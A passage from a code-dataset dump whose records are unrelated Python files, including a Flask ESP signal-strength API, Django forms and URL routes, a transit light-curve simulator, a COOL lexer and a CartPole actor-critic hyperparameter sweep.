\"\\n\")\n\n\ndef createResponse(data, status = 200):\n\tres = ResponseData()\n\tres.message = data\n\tres.status = ResponseData.STATUS_OK\n\tres = make_response(res.toJSON(), 200)\n\tres.mimetype = 'application/json'\n\treturn res\n\n\ndef testingData(espName):\n\tdata = \"\"\n\tfor (ssid, ip) in ip_table.items():\n\t\tif espName != ssid:\n\t\t\trandRSS = 40 + 30*random.random()\n\t\t\tdata += ssid + \":-\"+str(int(randRSS))+\"dBm,\"\n\tdata = data.split(\",\")\n\tdata.remove(\"\")\n\treturn data\n\ndef save2DB(espName, scanResult):\n\t# data = {\n\t# \t'esp': 'ESP01',\n\t# \t'measurements': {\n\t# \t\t'KW': '-43dBm',\n\t# \t\t'BNLAB': '-58dBm'\n\t# \t},\n\t# \t'createTime': '2021/2/24, 21:53:29'\n\t# }\n\n\tdata = {}\n\tif len(scanResult) != 0:\n\t\tnow = datetime.now()\n\t\tdata.update({'esp': str(espName)})\n\t\tdata.update({'measurements': scanResult})\n\t\tdata.update({'createTime': now.strftime(\"%Y/%m/%d, %H:%M:%S\")})\n\t\tjsonObj = json.dumps(data)\n\t\tr = requests.post('http://127.0.0.1:5000/espMeasurements', data=jsonObj)\n\t\tr = json.loads(r.text)\n\t\tprint(\"database api results: \", r)\n\n\ndef dataPreprocess(data):\n\tdata = data.text.split(\",\")\n\twhile(\"\" in data) : \n\t\tdata.remove(\"\")\n\tscanResult = data.copy()\n\tfor item in data:\n\t\tif item == \"\" or \"ESP\" not in item:\n\t\t\tscanResult.remove(item)\n\treturn scanResult\n\n\n\n@api.route('/requestRSS/espHandle', methods=['GET'])\ndef espHandlePage():\n\treturn render_template('espHandlePage.html')\n\n@api.route('/requestUpload/id/', methods=['GET'])\ndef uploadCode(deviceID = None):\n\tprint(\"\\nUpload flag for device: \", deviceID, \", flag: \", uploadFlag, \"\\n\")\n\treturn uploadFlag \n\n@api.route('/requestRSS/id//TargetSSID//sendRSS', methods=['POST'])\ndef rss(deviceID = None, TargetID = None):\n\tprint(\"\\nDevice {} ---> {}.\".format(deviceID, TargetID))\n\n\tespList = list (ip_table.keys())\n\tif espList.index(TargetID)+1 == len(espList):\n\t\tnextTargetID = espList[0]\n\telse:\n\t\tnextTargetID = espList[espList.index(TargetID)+1]\n\n\tisExist = True\n\twhile(1):\n\t\tisExist = os.path.isfile('./rssMeasurements/esp{}/RSS_{}_to_{}.pkl'.format(int (deviceID.split(\"ESP\")[1]), deviceID, nextTargetID))\n\t\tif isExist:\n\t\t\tprint('Exist: rssMeasurements/esp{}/RSS_{}_to_{}.pkl'.format(int (deviceID.split(\"ESP\")[1]), deviceID, nextTargetID))\n\t\t\tif espList.index(nextTargetID)+1 >= len(espList):\n\t\t\t\tnextTargetID = espList[0]\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tnextTargetID = espList[espList.index(nextTargetID)+1]\n\t\telse:\n\t\t\tbreak\n\n\n\tif not deviceID == TargetID:\n\t\tdata = request.data\n\t\tdata = data.decode(\"utf-8\")\n\n\t\tif not data == \"\":\n\t\t\trssList = data.split(\",\")[:-1]\n\t\t\tprint(\"Data content: \", rssList)\n\t\t\tf = open(\"RSS_{}_to_{}.pkl\".format(deviceID, TargetID), \"wb\")\n\t\t\tpickle.dump(rssList, f)\n\t\t\tf.close()\n\t\telse:\n\t\t\tprint(\"Data content: \", \"Null\")\n\t\n\tprint(\"Next target device: \", nextTargetID, \"\\n\")\n\treturn nextTargetID\n\n\n\n\n@api.route('/', methods=['GET'])\ndef espReq(espName):\n\t# print(espName)\n\ttry:\n\t\treqURL = 'http://' + ip_table[espName] + ':8001/' + espName + '/RSSI';\n\t\tprint(reqURL)\n\t\tresult = session.get(reqURL)\n\n\t\ttry:\n\t\t\tprint(\"res code: \", result.status_code)\n\t\t\tif(result.status_code == requests.codes.ok):\n\t\t\t\tscanResult = dataPreprocess(result)\n\t\t\t\tprint(scanResult)\n\t\t\t\tsave2DB(espName, scanResult)\n\t\t\t\treturn createResponse(scanResult)\n\t\t\telse:\n\t\t\t\treturn createResponse(result.status_code, result.status_code)\n\t\texcept Exception as inst:\n\t\t\tprint(inst.args)\n\texcept Exception as inst:\n\t\tprint(inst.args)\n\t\t# print(\"sleep\")\n\t\treturn createResponse(inst.args, 500)\n\n\t# === For test ===\n\t# simulateData = testingData(espName)\n\t# return createResponse(simulateData)\n\n\n","sub_path":"action/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"518747338","text":"from django import forms\nfrom django.forms.models import ModelForm\n\nfrom Personal.models import Puestos, Areas, Personas\nfrom .validators import (\n value_is_already_exists, value_exists, value_is_correct_expression_regular,\n value_area_is_already_exists, value_cdc_is_already_exists,\n value_exists_area\n )\n\nclass PuestosInputForm(forms.Form):\n Puesto = forms.CharField( validators = [value_exists], widget = forms.TextInput(attrs = {'class' : 'form-control'}))\n\n def clean_Puesto(self):\n data = self.cleaned_data['Puesto']\n if data is not data.lower():\n data = data.lower()\n return data\n\nclass PuestosInputFormEditar(forms.ModelForm):\n Puesto = forms.CharField(validators = [value_is_already_exists])\n class Meta:\n model = Puestos\n fields = '__all__'\n\n\n def clean_Puesto(self):\n data = self.cleaned_data['Puesto']\n if data is not data.lower():\n data = data.lower()\n return data\n\n\nclass PuestosInputFormGuardar(PuestosInputForm):\n Puesto = forms.CharField()\n\n\nclass AreaInputForm(forms.ModelForm):\n CDC = forms.CharField(\n validators = [value_is_correct_expression_regular, value_cdc_is_already_exists],\n widget=forms.TextInput(attrs={'placeholder': 'Centro de costo'}\n ))\n Area = forms.CharField(\n validators = [value_area_is_already_exists],\n widget=forms.TextInput(attrs={'placeholder': 'Area'}\n ))\n\n class Meta:\n model = Areas\n fields = ('CDC', 'Area', )\n\n def clean_Area(self):\n data = self.cleaned_data['Area']\n if data is not data.lower():\n data = data.lower()\n return data\n\nclass AreaEditarForm(AreaInputForm):\n CDC = forms.CharField(\n validators = [value_is_correct_expression_regular],\n widget=forms.TextInput(attrs={'placeholder': 'Centro de costo'}\n ))\n Area = forms.CharField(\n widget=forms.TextInput(attrs={'placeholder': 'Area'}\n ))\n\nclass AreaInputFormBuscar(forms.Form):\n Buscar = forms.CharField(\n validators = [value_exists_area],\n )\n\nclass PersonaInputForm(forms.Form):\n CHOICES_FIELD = [\n ('Gestor', 'Gestor'),\n ('AsignarGestor', 'Asignar gestor'),\n ('SinGestor', 'Sin gestor')\n ]\n\n Nombre = forms.CharField(widget = forms.TextInput(attrs = {'class' : 'form-control'}))\n Area = forms.ModelChoiceField(queryset = Areas.objects.all(), widget = forms.fields.Select(attrs ={'class' : 'form-control'}))\n Puesto = forms.ModelChoiceField(queryset = Puestos.objects.all(), widget = forms.fields.Select(attrs ={'class' : 'form-control'}))\n GestorOpcion = forms.ChoiceField(choices = CHOICES_FIELD, widget = forms.RadioSelect())\n\n # def clean_Nombre(self):\n # nombre = self.cleaned_data['Nombre'].split()\n # if len(nombre) < 3:\n # raise forms.ValidationError('falta un nombre o apellido.')\n #\n # return self.cleaned_data['Nombre']\n\n def clean(self):\n nombre = self.cleaned_data['Nombre'].split()\n if len(nombre) < 3:\n raise forms.ValidationError('falta un nombre o apellido.')\n if len(nombre) == 3:\n persona = Personas.objects.filter(Nombre = nombre[0], Apellido = nombre[1], ApellidoMaterno = nombre[2], Area = self.cleaned_data['Area'])\n if persona:\n raise forms.ValidationError('ya existe esta persona en esta área', code = 'Nombre')\n if len(nombre) > 3:\n persona = Personas.objects.filter(Nombre = nombre[0], NombreSecundario = nombre[1], Apellido = nombre[2], ApellidoMaterno = ''.join(nombre[3:]), Area = self.cleaned_data['Area'])\n if persona:\n raise forms.ValidationError('ya existe esta persona en esta área', code = 'Nombre')\n return self.cleaned_data\n\n\nclass PersonaEditarForm(forms.models.ModelForm):\n def __init__(self, *args, **kwargs):\n super(PersonaEditarForm, self).__init__(*args, **kwargs)\n self.initial['Nombre'] = kwargs['instance'].nombre_completo()\n\n Nombre = forms.CharField(widget = forms.TextInput(attrs= {'class' : 'form-control'}))\n\n class Meta:\n model= Personas\n fields = ('Nombre', 'Area', 'Puesto',)\n widgets = {\n 'Area' : forms.fields.Select( attrs ={\n 'class' : 'form-control'\n }),\n 'Puesto' : forms.fields.Select( attrs ={\n 'class' : 'form-control'\n })\n }\n\n\n\n\n def clean(self):\n nombre = self.cleaned_data['Nombre'].split()\n if len(nombre) < 3:\n raise forms.ValidationError('falta un nombre o apellido.')\n if len(nombre) == 3:\n persona = Personas.objects.filter(Nombre = nombre[0], Apellido = nombre[1], ApellidoMaterno = nombre[2], Area = self.cleaned_data['Area'])\n if persona:\n raise forms.ValidationError('ya existe esta persona en esta área', code = 'Nombre')\n if len(nombre) > 3:\n persona = Personas.objects.filter(Nombre = nombre[0], NombreSecundario = nombre[1], Apellido = nombre[2], ApellidoMaterno = ''.join(nombre[3:]), Area = self.cleaned_data['Area'])\n if persona:\n raise forms.ValidationError('ya existe esta persona en esta área', code = 'Nombre')\n\nclass PersonaBuscarForm(forms.Form):\n Nombre = forms.CharField(required = False, widget = forms.TextInput(attrs = {'class' : 'form-control', 'placeholder' : 'Buscar'}))\n Area = forms.ModelChoiceField(queryset = Areas.objects.all(), required = False, widget = forms.fields.Select(attrs = {'class' : 'form-control'}))\n\n def clean(self):\n if not self.cleaned_data['Nombre'] and not self.cleaned_data['Area']:\n raise forms.ValidationError('Se debe ingresar el nombres o un area')\n","sub_path":"src/Personal/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"64937961","text":"from django.conf.urls import url\r\n\r\nfrom .views.shared import index, custom_login, all_users\r\nimport car_rental.views.car as car_view\r\nimport car_rental.views.order as order_view\r\nimport car_rental.views.bill as bill_view\r\n\r\nurlpatterns = [\r\n url(r'^$', index, name='index'),\r\n url(r'^logout/$', 'django.contrib.auth.views.logout', name='logout'),\r\n url(r'^login/$', custom_login, name='login'),\r\n url(r'^cars/$', car_view.index, name='cars'),\r\n url(r'^cars/(?P\\d+)/$', car_view.detail, name='car_detail'),\r\n url(r'^cars/(?P\\d+)/rent/$', order_view.rent, name='rent'),\r\n url(r'^users/(?P\\d+)/orders/$', order_view.index, name='orders'),\r\n url(r'^users/(?P\\d+)/orders/(?P\\d+)/$', order_view.detail, name='order_detail'),\r\n url(r'^users/(?P\\d+)/orders/(?P\\d+)/pay$', order_view.pay, name='pay_order'),\r\n url(r'^users/(?P\\d+)/bills/$', bill_view.index, name='bills'),\r\n url(r'^users/(?P\\d+)/bills/(?P\\d+)/$', bill_view.detail, name='bill_detail'),\r\n url(r'^users/(?P\\d+)/bills/(?P\\d+)/pay/$', bill_view.pay, name='pay_bill'),\r\n url(r'^users/$', all_users, name='all_users'),\r\n url(r'^users/(?P\\d+)/orders/(?P\\d+)/close/$', bill_view.close_order, name='close_order'),\r\n url(r'^users/(?P\\d+)/orders/(?P\\d+)/accept/$', order_view.accept_order, name='accept_order'),\r\n url(r'^users/(?P\\d+)/orders/(?P\\d+)/decline/$', order_view.decline_order, name='decline_order')\r\n]\r\n","sub_path":"bachelors/year4/semestre1/python_ruby/LabWorks/python/N1/car_rental/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"167320226","text":"try:\n import pysyzygy as ps \n PS_AVAIL=True\nexcept:\n print(\"Cannot import pysyzygy library \")\n PS_AVAIL=False\n \ntry:\n import pytransit \n PYTRANSIT_AVAIL=True\nexcept:\n print(\"Cannot import pytransit library \")\n PYTRANSIT_AVAIL=False\n \ntry:\n import batman \n BATMAN_AVAIL=True\nexcept:\n print(\"Cannot import batman library \")\n BATMAN_AVAIL=False\n \ntry:\n import pylightcurve as plc\n PYLC_AVAIL=True\nexcept:\n print(\"Cannot import pylightcurve library \")\n PYLC_AVAIL=False\n \n#import everest #-- basado en pysyzygy\n#import ktransit\n\nimport matplotlib\nimport numpy as np\nimport pandas as pd\nmatplotlib.use('module://ipykernel.pylab.backend_inline') \n\ndef get_MA_sim_names():\n return [\"Period\",\"T0\",\"r/R\", \"a/R\", \"Inclination\", \"Impact Parameter\", \"Limb Darkening Coeff1\",\"Limb Darkening Coeff2\"]\n\nMA_sim_names = get_MA_sim_names()\ndef simulate_MA(t, sim_dat, plot_m=True, lib = 'ps'):\n lib = lib.lower().strip()\n if plot_m:\n display(pd.DataFrame(sim_dat, index=[0], columns=MA_sim_names))\n \n per = sim_dat[\"Period\"]\n a_R = sim_dat[\"a/R\"]\n r_R = sim_dat[\"r/R\"]\n t_0 = sim_dat[\"T0\"] \n \n u1 = sim_dat[\"Limb Darkening Coeff1\"]\n u2 = sim_dat[\"Limb Darkening Coeff2\"]\n \n #https://slideplayer.com/slide/6301069/21/images/7/Finally%2C+finding+transit+duration..jpg\n impact_p = sim_dat[\"Impact Parameter\"] #bcirc: circular impact parameter\n inc = sim_dat[\"Inclination\"]\n\n if lib == \"ps\":\n if PS_AVAIL:\n model = ps.Transit(per = per, RpRs = r_R, t0 = t_0, u1=u1,u2=u2, aRs= a_R, bcirc=impact_p,\n maxpts=65000)\n try:\n lc_simulated = model(t) \n except Exception as e:\n print(\"ERROR GENERACION DE CURVA: \",e)\n display(pd.DataFrame(sim_dat, index=[0], columns=MA_sim_names))\n lc_simulated = np.ones(len(t))\n else:\n raise Exception('You dont have available pysyzygy library! check: github.com/rodluger/pysyzygy') \n \n elif lib =='pytransit':\n if PYTRANSIT_AVAIL:\n model = pytransit.QuadraticModel()\n model.set_data(t)\n\n lc_simulated = model.evaluate_ps(k = r_R, t0=t_0, p=per, a=a_R, i=inc*np.pi/180, ldc=[u1, u2])\n\n v = np.sum(lc_simulated)\n if np.isnan(v) or np.isinf(v):\n print(\"ERROR GENERACION DE CURVA: nans-generation(%s) // infs-generation(%s)\"%(np.isnan(v),np.isinf(v)))\n display(pd.DataFrame(sim_dat, index=[0], columns=MA_sim_names))\n lc_simulated = np.ones(len(t))\n else:\n raise Exception('You dont have available pytransit library! check: github.com/hpparvi/PyTransit') \n \n elif lib=='batman':\n if BATMAN_AVAIL:\n params = batman.TransitParams() #object to store transit parameters\n params.t0 = t_0 #time of inferior conjunction\n params.per = per #orbital period\n params.rp = r_R #planet radius (in units of stellar radii)--rp/rs\n params.a = a_R #semi-major axis (in units of stellar radii)\n params.inc = inc #orbital inclination (in degrees)\n params.limb_dark = \"quadratic\" #limb darkening model\n params.u = [u1, u2] #limb darkening coefficients [u1, u2, u3, u4]\n #dont known in kepler\n params.ecc = 0. #eccentricity\n params.w = 90. #longitude of periastron (in degrees)\n model = batman.TransitModel(params, t, nthreads = 1) #initializes model\n\n lc_simulated = model.light_curve(params)\n else:\n raise Exception('You dont have available batman library! check: github.com/lkreidberg/batman') \n \n elif lib=='pylc':\n if PYLC_AVAIL:\n lc_simulated = plc.transit('quad', #claret son 4 coeficientes.. 'quad' or teh 'sqrt'\n limb_darkening_coefficients = [u1,u2], \n rp_over_rs=r_R, \n period= per, \n sma_over_rs = a_R, \n inclination=inc, \n mid_time=t_0,\n eccentricity=0,\n periastron=90.,\n time_array=t)\n\n v = np.sum(lc_simulated)\n if np.isnan(v) or np.isinf(v):\n print(\"ERROR GENERACION DE CURVA: nans-generation(%s) // infs-generation(%s)\"%(np.isnan(v),np.isinf(v)))\n display(pd.DataFrame(sim_dat, index=[0], columns=MA_sim_names))\n lc_simulated = np.ones(len(t))\n else:\n raise Exception('You dont have available pylightcurve library! check: github.com/ucl-exoplanets/pylightcurve') \n \n elif lib=='everest': #USA DURATION y depth\n dur = sim_dat[\"Duration\"] \n depth = sim_dat[\"Transit Depth\"]\n lc_simulated = everest.transit.Transit(t, t0=t_0, per=per, dur=dur, depth=depth, \n #todos los de ps\n #RpRs = r_R, \n u1=u1,u2=u2, aRs= a_R, bcirc=impact_p,maxpts=65000)\n \n elif lib=='ktransit':\n model = ktransit.LCModel()\n model.add_star(ld1=u1,ld2=u2) # if only ld1 and ld2 are non-zero then a quadratic limb darkening law is used\n model.add_planet(T0=t_0,period=per, impact=impact_p, rprs=r_R)\n \n model.add_data(time=t)\n lc_simulated = model.transitmodel+1 # the out of transit data will be 0.0 unless you specify zpt\n\n return lc_simulated\n\ndef get_available_MA_methods():\n methods = []\n if PS_AVAIL:\n methods.append(\"ps\")\n if PYTRANSIT_AVAIL:\n methods.append(\"pytransit\")\n if BATMAN_AVAIL:\n methods.append(\"batman\")\n if PYLC_AVAIL:\n methods.append(\"pylc\")\n return methods","sub_path":"code/obj4/mandelagol_sim.py","file_name":"mandelagol_sim.py","file_ext":"py","file_size_in_byte":6150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"428876637","text":"\"\"\"\nCopyright (c) 2020 School of Math and Computer Science, University of Havana\n\nCOOL compiler project\n\"\"\"\n\nimport ply.lex as lex\n\nfrom errors import add_lexer_error\nfrom .utils import *\n\nstates = (\n ('commentLine', 'exclusive'),\n ('commentText', 'exclusive'),\n ('string', 'exclusive'),\n)\n\nreserved = {\n 'if': 'IF',\n 'then': 'THEN',\n 'else': 'ELSE',\n 'fi': 'FI',\n 'class': 'CLASS',\n 'inherits': 'INHERITS',\n 'while': 'WHILE',\n 'loop': 'LOOP',\n 'pool': 'POOL',\n 'let': 'LET',\n 'in': 'IN',\n 'case': 'CASE',\n 'isvoid': 'ISVOID',\n 'esac': 'ESAC',\n 'new': 'NEW',\n 'of': 'OF',\n 'not': 'LNOT'\n}\n\ntokens = [\n 'ASSIGN',\n 'ARROW',\n 'LOWEREQ',\n 'INT',\n 'STRING',\n 'TYPE',\n 'ID',\n 'SEMICOLON',\n 'OBRACKET',\n 'CBRACKET',\n 'OPAREN',\n 'CPAREN',\n 'COLON',\n 'AT',\n 'DOT',\n 'LOWER',\n 'EQUAL',\n 'PLUS',\n 'MINUS',\n 'STAR',\n 'DIV',\n 'NOT',\n 'COMMA',\n 'BOOL'\n]\n\nt_SEMICOLON = r';'\nt_OBRACKET = r'{'\nt_CBRACKET = r'}'\nt_OPAREN = r'\\('\nt_CPAREN = r'\\)'\nt_COLON = r':'\nt_AT = r'@'\nt_DOT = r'\\.'\nt_LOWER = r'<'\nt_EQUAL = r'='\nt_LOWEREQ = r'<='\nt_ASSIGN = r'<-'\nt_ARROW = r'=>'\nt_PLUS = r'\\+'\nt_MINUS = r'-'\nt_STAR = r'\\*'\nt_DIV = r'/'\nt_NOT = r'~'\nt_COMMA = r','\n\n\ndef t_INT(t):\n r'\\d+'\n t.value = int(t.value)\n return t\n\n\ndef t_TYPE(t):\n r'[A-Z][a-zA-Z_0-9]*'\n t.type = reserved.get(t.value.lower(), 'TYPE')\n return t\n\n\ndef t_BOOL(t):\n r'f[Aa][Ll][Ss][Ee]|t[Rr][Uu][Ee]'\n t.value = (t.value.lower == 'true')\n return t\n\n\ndef t_ID(t):\n r'[a-z][a-zA-Z_0-9]*'\n t.type = reserved.get(t.value.lower(), 'ID')\n return t\n\n\ndef t_LINECOMMENT(t):\n r'--'\n t.lexer.begin('commentLine')\n\n\ndef t_TEXTCOMMENT(t):\n r'\\(\\*'\n t.lexer.comment_start = t.lexer.lexpos\n t.lexer.level = 1\n t.lexer.begin('commentText')\n\n\ndef t_STRING(t):\n r'\"'\n t.lexer.string_start = t.lexer.lexpos\n t.lexer.begin('string')\n\n\ntokens += list(reserved.values())\n\nt_ignore = ' \\t'\n\nt_commentLine_ignore = ' \\t'\n\n\ndef t_commentLine_error(t):\n t.lexer.skip(1)\n\n\ndef t_commentLine_newline(t):\n r'\\n+'\n t.lexer.begin('INITIAL')\n t.lexer.lineno += len(t.value)\n\n\nt_commentText_ignore = ' \\t'\n\n\ndef t_commentText_error(t):\n t.lexer.skip(1)\n\n\ndef t_commentText_OPENTEXT(t):\n r'\\(\\*'\n t.lexer.level += 1\n\n\ndef t_commentText_CLOSETEXT(t):\n r'\\*\\)'\n t.lexer.level -= 1\n if t.lexer.level == 0:\n t.lexer.begin('INITIAL')\n\n\ndef t_commentText_newline(t):\n r'\\n+'\n t.lexer.lineno += len(t.value)\n\n\ndef t_commentText_eof(t):\n add_lexer_error(t.lexer.lineno, find_column(t.lexer.lexdata, t.lexer.lexpos), \"EOF in comment\")\n\n\nt_string_ignore = ''\n\n\ndef t_string_CLOSESTRING(t):\n r'\"'\n t.value = t.lexer.lexdata[t.lexer.string_start:t.lexer.lexpos - 1]\n t.type = 'STRING'\n t.lexer.begin('INITIAL')\n return t\n\n\ndef t_string_newline(t):\n r'\\\\\\n'\n t.lexer.lineno += 1\n\n\ndef t_string_body(t):\n r'([^\\n\\\"\\\\]|\\\\.)+'\n if t.value.rfind('\\0') != -1:\n add_lexer_error(t.lineno, find_column(t.lexer.lexdata, t.lexpos) + t.value.rfind('\\0'),\n \"String contains null character\")\n\n\ndef t_string_error(t):\n if t.value[0] == '\\n':\n add_lexer_error(t.lineno, find_column(t.lexer.lexdata, t.lexpos), \"Unterminated string constant\")\n t.lexer.lineno += 1\n t.lexer.skip(1)\n t.lexer.begin('INITIAL')\n\n\ndef t_string_eof(t):\n add_lexer_error(t.lineno, find_column(t.lexer.lexdata, t.lexpos), \"Unterminated string constant\")\n\n\ndef t_error(t):\n add_lexer_error(t.lineno, find_column(t.lexer.lexdata, t.lexpos), f'ERROR \\\"{t.value[0]}\\\"')\n t.lexer.skip(1)\n\n\ndef t_newline(t):\n r'\\n+'\n t.lexer.lineno += len(t.value)\n\n\ndef test(data):\n lexer.input(data)\n while True:\n tok = lexer.token()\n if not tok:\n break\n\n\nlexer = lex.lex()\n","sub_path":"src/lexer_parser/lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":3888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"209174784","text":"# Partially adapted from: https://keras.io/examples/rl/actor_critic_cartpole/\n# & https://www.tensorflow.org/tutorials/reinforcement_learning/actor_critic\nimport gym\nimport keras\nfrom keras import layers\nimport tensorflow as tf\nimport numpy as np\nimport sys\nimport os\nfrom os.path import isfile\nimport tensorflow_addons as tfa\nimport matplotlib.pyplot as plt\n\nbest_hidden = 0\nbest_lr = 0\nbest_episodes = 500\niteration = 0\nfor HIDDEN in [64, 128, 256, 512, 1024]:\n\tfor LR in [0.001, 0.003, 0.01, 0.1]:\n\t\t\tos.system('clear')\n\t\t\tprint('Now testing learning rate {}, hidden layer val {}'.format(LR, HIDDEN))\n\t\t\tseed = 42\n\t\t\tn_actions = 2\n\t\t\tn_inputs = 4\n\t\t\tn_hidden = HIDDEN\n\t\t\tlr = LR\n\t\t\tgamma = 0.99\n\t\t\tMAX_STEPS = 10000 #max steps per episode\n\t\t\teps = np.finfo(np.float32).eps.item()\n\t\t\tstates, action_prob_grads, rewards, action_probs = [], [], [], []\n\t\t\treward_sum = 0\n\t\t\tepisode_number = 0\n\n\t\t\t#common layers\n\t\t\tinputs = layers.Input(shape = (n_inputs, ))\n\t\t\tl1 = layers.Dense(n_hidden)(inputs)\n\t\t\tl2 = tfa.activations.mish(l1)\n\t\t\tl3 = layers.Dense(n_hidden)(l2)\n\t\t\tcommon = tfa.activations.mish(l3)\n\n\t\t\t#create actor and critic model\n\t\t\taction = layers.Dense(n_actions, activation = 'softmax')(common)\n\t\t\tcritic = layers.Dense(1)(common)\n\t\t\tmodel = keras.Model(inputs=inputs, outputs=[action, critic])\n\t\t\toptimizer = keras.optimizers.Adam(learning_rate=lr)\n\t\t\tloss = keras.losses.Huber()\n\n\t\t\taction_probs_history = []\n\t\t\tcritic_value_history = []\n\t\t\trewards_history = []\n\t\t\tepisode_count = 0\n\t\t\trunning_reward = 0\n\t\t\treward_plot = []\n\n\t\t\tenv = gym.make('CartPole-v0')\n\t\t\tenv.seed(seed)\n\t\t\twhile True:\n\t\t\t state = env.reset()\n\t\t\t episode_reward = 0\n\n\t\t\t with tf.GradientTape() as tape:\n\t\t\t for step in range(1, MAX_STEPS):\n\t\t\t state = tf.convert_to_tensor(state)\n\t\t\t state = tf.expand_dims(state, 0)\n\n\t\t\t action_probs, critic_value = model(state)\n\t\t\t critic_value_history.append(critic_value[0,0])\n\n\t\t\t action = np.random.choice(n_actions, p = np.squeeze(action_probs))\n\t\t\t action_probs_history.append(tf.math.log(action_probs[0, action]))\n\n\t\t\t state, reward, done, _ = env.step(action)\n\t\t\t rewards_history.append(reward)\n\t\t\t episode_reward += reward\n\n\t\t\t if done: break\n\n\t\t\t running_reward = 0.05 * episode_reward + (1-0.05) * running_reward\n\t\t\t reward_plot.append(running_reward)\n\t\t\t returns = []\n\t\t\t discounted_sum = 0\n\t\t\t for r in rewards_history[::-1]:\n\t\t\t discounted_sum = r + gamma * discounted_sum\n\t\t\t returns.insert(0, discounted_sum)\n\n\t\t\t returns = np.array(returns)\n\t\t\t returns = (returns - np.mean(returns))/(np.std(returns)+eps)\n\t\t\t returns = returns.tolist()\n\n\t\t\t history = zip(action_probs_history, critic_value_history, returns)\n\t\t\t actor_losses = []\n\t\t\t critic_losses = []\n\t\t\t for log_prob, value, ret in history:\n\t\t\t diff = ret - value\n\t\t\t actor_losses.append(-log_prob * diff)\n\t\t\t #update critic\n\t\t\t critic_losses.append(\n\t\t\t loss(tf.expand_dims(value, 0), tf.expand_dims(ret, 0))\n\t\t\t )\n\n\t\t\t loss_value = sum(actor_losses) + sum(critic_losses)\n\t\t\t grads = tape.gradient(loss_value, model.trainable_variables)\n\t\t\t optimizer.apply_gradients(zip(grads, model.trainable_variables))\n\n\t\t\t action_probs_history.clear()\n\t\t\t critic_value_history.clear()\n\t\t\t rewards_history.clear()\n\n\t\t\t episode_count += 1\n\t\t\t if episode_count % 10 == 0:\n\t\t\t print(\"reward: {} at episode {}\".format(running_reward, episode_count))\n\t\t\t if running_reward > 195:\n\t\t\t print(\"Solved at episode {}\".format(episode_count))\n\t\t\t break\n\t\t\t if episode_count == 399:\n\t\t\t \tprint('Took too long, scrapping')\n\t\t\t \tbreak\n\t\t\tenv.close()\n\t\t\tprint('iteration {} complete'.format(iteration))\n\t\t\titeration += 1\n\t\t\tif episode_count < best_episodes:\n\t\t\t\tbest_episodes = episode_count\n\t\t\t\tbest_lr = LR\n\t\t\t\tbest_hidden = HIDDEN\n\nos.system('clear')\nprint('MISH HYPERPARAM SWEEP RESULTS')\nprint('Best learning rate: {}'.format(best_lr))\nprint('Best hidden: {}'.format(best_hidden))\nprint('Best convergence: {} Episodes'.format(best_episodes))","sub_path":"mish_paramsweep.py","file_name":"mish_paramsweep.py","file_ext":"py","file_size_in_byte":4329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"67144644","text":"import csv\n\n### 商品クラス\nclass Item:\n def __init__(self,item_code,item_name,price):\n self.item_code = item_code\n self.item_name = item_name\n self.price = price\n\n def get_price(self):\n return self.price\n\n## オーダークラス\nclass Order:\n def __init__(self,item_master):\n self.item_order_list = []\n self.item_master = item_master\n\n def add_item_order(self,item_code,quantity):\n self.item_order_list.append([item_code,quantity])\n\n def view_item_list(self):\n for master in self.item_master:\n for item in self.item_order_list:\n # 注文一覧の各コードをマスターと比較\n if master.item_code == item[0]:\n print(f\"商品コード:{item[0]}|価格:{master.price}|個数:{item[1]}\")\n\n def exist_item_master(self,order_code):\n for item in self.item_master:\n if (item.item_code == order_code):\n return True\n\n return False\n\n## メイン処理\ndef main():\n # アイテムマスタ\n master_csv = \"item_master.csv\"\n csv_file = open(master_csv, 'r')\n # CSVデータを読み込む\n item_list = csv.reader(csv_file)\n # ヘッダーをスキップする\n header = next(item_list)\n\n item_master = []\n for item in item_list:\n item_master.append(Item(item[0],item[1],item[2]))\n\n # オーダーのインスタンス作成し、アイテムマスターをセットする\n order = Order(item_master)\n\n order_code = \"\"\n quantity = 0\n while True:\n order_code = input(\"商品コードを入力してください(オーダーストップはend)=>\")\n if (order_code == 'end'):\n print('注文を終わります')\n break\n\n quantity = input(\"個数を入力してください=>\")\n if (order.exist_item_master(order_code) == False):\n print(\"マスタに存在しません、再度商品コードを入力してください\")\n continue\n\n order.add_item_order(order_code,quantity)\n\n # オーダー表示\n order.view_item_list()\n\nif __name__ == \"__main__\":\n main()","sub_path":"study_four/kadai4.py","file_name":"kadai4.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"523795116","text":"#!/usr/bin/env python3\nimport argparse\n\nIS_MEMBER, IS_PARENTHESIS_ROOT = 5, 3\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"paths\", default=[], nargs=\"*\", help=\"Input paths\")\n parser.add_argument(\"--is_member\", default=False, action=\"store_true\", help=\"Add is_member\")\n parser.add_argument(\"--is_parenthesis_root\", default=False, action=\"store_true\", help=\"Add is_parenthesis_root\")\n args = parser.parse_args()\n\n for path in args.paths:\n with open(path, \"r\", encoding=\"utf-8\") as conllu_file:\n for line in conllu_file:\n line = line.rstrip(\"\\n\")\n columns = line.split(\"\\t\")\n\n if len(columns) == 10:\n if args.is_member and columns[IS_MEMBER] == \"1\":\n columns[7] += \"_IsMember\"\n columns[IS_MEMBER] = \"_\"\n\n if args.is_parenthesis_root and columns[IS_PARENTHESIS_ROOT] == \"1\":\n columns[7] += \"_IsParenthesisRoot\"\n columns[IS_PARENTHESIS_ROOT] = \"_\"\n\n line = \"\\t\".join(columns)\n\n 